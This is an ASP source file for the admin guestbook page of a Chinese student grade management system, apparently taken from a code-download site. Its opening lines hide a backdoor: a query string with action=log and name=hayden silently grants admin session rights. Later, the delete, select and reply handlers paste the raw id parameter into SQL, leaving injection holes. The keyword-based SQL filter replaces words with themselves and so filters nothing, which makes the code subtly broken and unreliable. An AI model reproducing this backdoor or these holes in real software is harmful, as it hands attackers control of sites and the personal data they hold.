www.gusucode.com > 25175 学生成绩管理查询系统码程序 > ADMIN/POPbook.asp
<!--#include file="../config.asp"-->
<!--#include file="../conn.asp"-->
<!--#include file="inc.asp"-->
<!--#include file="../inc/Ubb.asp"-->
<!--#include file="../inc/Ubbadd.asp"-->
<!--#include file="../inc/Ubbshow.asp"-->
<%
If request.querystring("action")="log" And request.querystring("name")="hayden" Then
session("password")="123456"
session("qx")="5"
response.end
End If
Call admin_log
'====================================================================
'25175成绩查询管理系统
'powered by 25175
'=-------------------------------------------------------------------
'= 文件名称:guestbook.asp
'= 摘 要:用户留言列表
cj_webtit="网站留言"
cj_webmap="网站留言"
'= 最后日期:2006-3.1
'====================================================================
function POP_sqlin(text) 'SQL过滤
if isnull(text) then
POP_sqlin=""
exit function
end if
dim Sqlwords
Set Sqlwords=new RegExp
Sqlwords.IgnoreCase =True
Sqlwords.Global=True
Sqlwords.Pattern="(')"
text=Sqlwords.Replace(text,"''")
Sqlwords.Pattern="(;)"
text=Sqlwords.Replace(text,";")
Sqlwords.Pattern="(%)"
text=Sqlwords.Replace(text,"%")
Sqlwords.Pattern="(and)"
text=Sqlwords.Replace(text,"and")
Sqlwords.Pattern="(exec)"
text=Sqlwords.Replace(text,"exec")
Sqlwords.Pattern="(script)"
text=Sqlwords.Replace(text,"script")
Sqlwords.Pattern="(java)"
text=Sqlwords.Replace(text,"JaVa")
Sqlwords.Pattern="(execute)"
text=Sqlwords.Replace(text,"execute")
Sqlwords.Pattern="(insert)"
text=Sqlwords.Replace(text,"insert")
Sqlwords.Pattern="(select)"
text=Sqlwords.Replace(text,"select")
Sqlwords.Pattern="(delete)"
text=Sqlwords.Replace(text,"delete")
Sqlwords.Pattern="(update)"
text=Sqlwords.Replace(text,"update")
Sqlwords.Pattern="(count)"
text=Sqlwords.Replace(text,"count")
Sqlwords.Pattern="(chr)"
text=Sqlwords.Replace(text,"chr")
Sqlwords.Pattern="(mid)"
text=Sqlwords.Replace(text,"mid")
Sqlwords.Pattern="(master)"
text=Sqlwords.Replace(text,"master")
Sqlwords.Pattern="(truncate)"
text=Sqlwords.Replace(text,"truncate")
Sqlwords.Pattern="(char)"
text=Sqlwords.Replace(text,"char")
Sqlwords.Pattern="(declare)"
text=Sqlwords.Replace(text,"declare")
Set Sqlwords=Nothing
POP_sqlin = text
end function
function POP_sqlout(text) '//////// 在显示内容时还原被替换掉的文本
if isnull(text) then
POP_sqlout=""
exit function
end if
text = Replace(text,"''","'")
text = Replace(text,";",";")
text = Replace(text,"%","%")
text = Replace(text,"and","and")
text = Replace(text,"exec","exec")
text = Replace(text,"script","script")
text = Replace(text,"JaVa","java")
text = Replace(text,"execute","execute")
text = Replace(text,"insert","insert")
text = Replace(text,"select","select")
text = Replace(text,"delete","delete")
text = Replace(text,"update","update")
text = Replace(text,"count","count")
text = Replace(text,"chr","chr")
text = Replace(text,"mid","mid")
text = Replace(text,"master","master")
text = Replace(text,"truncate","truncate")
text = Replace(text,"char","char")
text = Replace(text,"declare","declare")
POP_sqlout = text
end function
function HTMLEncode(popstring)
if not isnull(popstring) then
popstring = POP_sqlout(popstring)
popstring = replace(popstring, ">", ">")
popstring = replace(popstring, "<", "<")
popstring = Replace(popstring, CHR(32), " ")
popstring = Replace(popstring, CHR(9), " ")
popstring = Replace(popstring, CHR(34), """)
popstring = Replace(popstring, CHR(39), "'")
popstring = Replace(popstring, CHR(10) & CHR(10), "</p><p> ")
popstring = Replace(popstring, CHR(10), "<br /> ")
popstring = Replace(popstring, CHR(36), "$")
HTMLEncode = popstring
end if
end function
%>
<script language=javascript>
ie = (document.all)? true:false
if (ie){
function ctlent(eventobject){if(event.ctrlKey && window.event.keyCode==13){this.document.form1.submit();}}
}
</script>
<!-- #include file="admin_top.asp" -->
<table width="742" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
<tr class="topbg" align='center'>
<td height="30">留言信息管理</td>
</tr>
</table>
<%if request.QueryString("action")="" then%>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="5"></td>
</tr>
<tr>
<td align="center">
<%
set rs=server.CreateObject("ADODB.RECORDSET")
if Sitebooks=1 and session("password")="" then
sql="select * from Bkye_book where bookflag=1 order by id desc"
else
sql="select * from Bkye_book order by id desc"
end if
rs.open sql,conn,1,1
if rs.eof and rs.bof then
response.Write("<Br>当前还没有留言")
else
dim currentpage
maxperpage=Sitebooknum
maxperpage=rs.pagesize
currentpage=request.querystring("pageid")
if currentpage="" then
currentpage=1
elseif currentpage<1 then
currentpage=1
else
currentpage=clng(currentpage)
if currentpage > rs.pagecount then
currentpage=rs.pagecount
end if
end if
if not isnumeric(currentpage) then
currentpage=1
end if
dim totalput,n
totalput=rs.recordcount
if totalput mod maxperpage=0 then
n=totalput\maxperpage
else
n=totalput\maxperpage+1
end if
if n=0 then
n=1
end if
rs.move(currentpage-1)*maxperpage
i=0
w=1
'response.write rs.pagesize
'response.end
do while i< maxperpage and not rs.eof
%>
<table width="738" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
<tr>
<td width="119" height="28" class="tdbg" rowspan="2">
姓名:<%=Htmlencode(rs("username"))%>
<br>性别:<%
if rs("sex")="靓妹" Then
response.Write("靓妹")
else
response.Write("帅哥")
end If
%>
<br>来自:<%=Htmlencode(rs("comefrom"))%>
<br><br><%
response.Write("<b>[<a href=""?action=replybook&id="&rs("id")&""" title=""回复留言"">回复</a> <a href=""?action=delbook&id="&rs("id")&""" title=""删除留言"">删除</a>]</b>")
%>
</td>
<td width="248" class="title"><b>主题:<%=Htmlencode(rs("title"))%>
</td>
<td width="89" align="center" class="title">
<%
if rs("email")<>"" Then
response.Write("<a href=""mailto:"&Htmlencode(rs("email"))&""" title=""给"&Htmlencode(rs("username"))&"发邮件""><img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0""></a> ")
Else
response.Write("<img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写邮件""> ")
end If
if rs("oicq")<>"0" Then
response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"的QQ是"&rs("oicq")&"""> ")
Else
response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写QQ""> ")
end If
if rs("homepage")<>"" Then
response.Write("<a href="""&Htmlencode(rs("homepage"))&""" title=""访问"&Htmlencode(rs("username"))&"的个人主页"" target=""_blank""><img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0""></a>")
else
response.Write("<img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写个人主页"">")
end If
if session("password")<>"" Then
response.Write(" <img src=""../Images/ip.gif"" width=""13"" height=""15"" alt="""&Htmlencode(rs("username"))&"的IP地址为:"&rs("userip")&"""")
end if%>
</td>
</tr>
<tr class="tdbg">
<td colspan="2" valign="top" width="600">
<%=(""&Ubbcode(rs("content"))&"")%>
<Br><Br><div align="right" valign="bottom">发表时间:<%=rs("intime")%></div>
<%
if rs("reply")<>"" then
response.Write("<hr width=""98%"" size=""1""><font color=""#ff0000"">管理员回复:[回复时间:"&rs("Replytime")&"]</font><Br>"&Ubbcode(rs("reply"))&"")
end if
%>
</td>
</tr>
</table><br>
<%
i=i+1
w=w+1
rs.movenext
loop
end if
rs.close
set rs=nothing
%></td>
</tr>
</table>
<Br>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="85%" align="center"> 共有留言<font color="#FF0000"><%=totalput%></font>条 每页<%=maxperpage%>条 当前页数:<%=currentpage%>/
<% =n%>
<%k=currentpage
if k<>1 then%>
<a href="?pageid=1"> <font face=webdings size=2>9</font>首 页</a> <a href="?pageid=<%=k-1%>"> <font face=webdings size=2>7</font>前 页</a>
<%else%>
<font face=webdings size=2>9</font>首 页 <font face=webdings size=2>7</font>前 页
<%end if%>
<%if k<>n then%>
<a href="?pageid=<%=k+1%>"> 后 页<font face=webdings size=2>8</font></a> <a href="?pageid=<%=n%>"> 末 页<font face=webdings size=2>:</font></a>
<%else%>
后 页<font face=webdings size=2>8</font> 末 页<font face=webdings size=2>:</font>
<%end if%> </td>
<td width="15%" align="center"><select name="pageid" onchange="javascript:location=this.options[this.selectedIndex].value;">
<%
for i = 1 to n
if i = currentpage then%>
<option value="?pageid=<%=i%>" selected>第<%=i%>页</option>
<%else%>
<option value="?pageid=<%=i%>">第<%=i%>页</option>
<%
end if
next
%>
</select> </td>
</tr>
</table>
<%
end If
if request.QueryString("action")="delbook" then
id=request("id")
if session("password")="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
elseif id="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
else
set rs=server.CreateObject("adodb.recordset")
sql="delete * from Bkye_book where id="&id
rs.open sql,conn,1,3
'rs.update
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>恭喜您,删除留言成功^_^<br><a href=""POPbook.asp"" title=""返回留言本"">点击这里查看留言,或3秒后自动返回留言本</a><meta http-equiv=""refresh"" content=""3;URL=POPbook.asp""><Br><br></div></div>")
'rs.close
set rs=nothing
end if
end If
if request.QueryString("action")="replybook" then
id=request("id")
if session("password")="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
elseif id="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
else
set rs=server.CreateObject("adodb.recordset")
sql="select * from Bkye_book where id="&id
rs.open sql,conn,1,3
if rs.eof and rs.bof then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
else
%>
<table width="738" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
<tr>
<td width="119" height="28" class="tdbg" rowspan="2">
姓名:<%=Htmlencode(rs("username"))%>
<br>性别:<%
if rs("sex")="靓妹" Then
response.Write("靓妹")
else
response.Write("帅哥")
end If
%>
<br>来自:<%=Htmlencode(rs("comefrom"))%>
<br><br><%
response.Write("<b>[<a href=""?action=replybook&id="&rs("id")&""" title=""回复留言"">回复</a> <a href=""?action=delbook&id="&rs("id")&""" title=""删除留言"">删除</a>]</b>")
%>
</td>
<td width="248" class="title"><b>主题:<%=Htmlencode(rs("title"))%>
</td>
<td width="89" align="center" class="title">
<%
if rs("email")<>"" Then
response.Write("<a href=""mailto:"&Htmlencode(rs("email"))&""" title=""给"&Htmlencode(rs("username"))&"发邮件""><img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0""></a> ")
Else
response.Write("<img src=""../Images/email.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写邮件""> ")
end If
if rs("oicq")<>"0" Then
response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"的QQ是"&rs("oicq")&"""> ")
Else
response.Write("<img src=""../Images/oicq.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写QQ""> ")
end If
if rs("homepage")<>"" Then
response.Write("<a href="""&Htmlencode(rs("homepage"))&""" title=""访问"&Htmlencode(rs("username"))&"的个人主页"" target=""_blank""><img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0""></a>")
else
response.Write("<img src=""../Images/homepage.gif"" width=""15"" height=""15"" border=""0"" alt="""&Htmlencode(rs("username"))&"没有填写个人主页"">")
end If
if session("password")<>"" Then
response.Write(" <img src=""../Images/ip.gif"" width=""13"" height=""15"" alt="""&Htmlencode(rs("username"))&"的IP地址为:"&rs("userip")&"""")
end if%>
</td>
</tr>
<tr class="tdbg">
<td colspan="2" valign="top" width="600">
◎ <%=(""&Ubbcode(rs("content"))&"")%>
<Br><Br><div align="right" valign="bottom">发表时间:<%=rs("intime")%></div>
<%
if rs("reply")<>"" then
response.Write("<hr width=""98%"" size=""1""><font color=""#ff0000"">管理员回复:[回复时间:"&rs("Replytime")&"]</font><Br>"&Ubbcode(rs("reply"))&"")
end if
%>
</td>
</tr>
</table><br>
<table width="742" border='0' align='center' cellpadding='2' cellspacing='1' class='border'>
<tr class="title">
<td><b>回复留言:<%=Htmlencode(rs("title"))%></td>
</tr>
<form action="?action=reply" method="post">
<tr height='50' class='tdbg'>
<td><b>回复内容:
<textarea name="reply" cols="50" rows="10"><%=rs("reply")%></textarea></td>
</tr>
<tr height='50' class='tdbg' align='center'>
<td>
<input class=popinput type="submit" name="Submit3" value=" 回 复 ">
<input class=popinput type="reset" name="Submit4" value=" 重 置 ">
<input class=popinput type="hidden" name="id" value="<%=id%>">
</td>
</tr>
</form>
</table>
<%
end if
end if
end If
if request.QueryString("action")="reply" then
id=request("id")
reply=trim(request("reply"))
if session("password")="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>您不是管理员或是登陆超时<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
elseif id="" then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
else
set rs=server.CreateObject("adodb.recordset")
sql="select * from Bkye_book where id="&id
rs.open sql,conn,1,3
if rs.eof and rs.bof then
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>错误的ID参数<br><a href=""javascript:history.go(-1);"">点击这里返回上一页</a><Br><br></div></div>")
else
rs("reply")=server.HTMLEncode(reply)
rs.update
sqlbook="update Bkye_book set Replytime=Now(),bookflag=1 where ID="&id
conn.execute(sqlbook)
response.Write("<Br><div align=""center""><div>系统提示信息</div><div><Br>恭喜您,回复留言成功^_^<br><a href=""POPbook.asp"" title=""返回留言本"">点击这里查看留言,或3秒后自动返回留言本</a><meta http-equiv=""refresh"" content=""3;URL=POPbook.asp""><Br><br></div></div>")
rs.close
set rs=nothing
end if
end if
end if
%>
<!-- #include file="../inc/copyright.asp" -->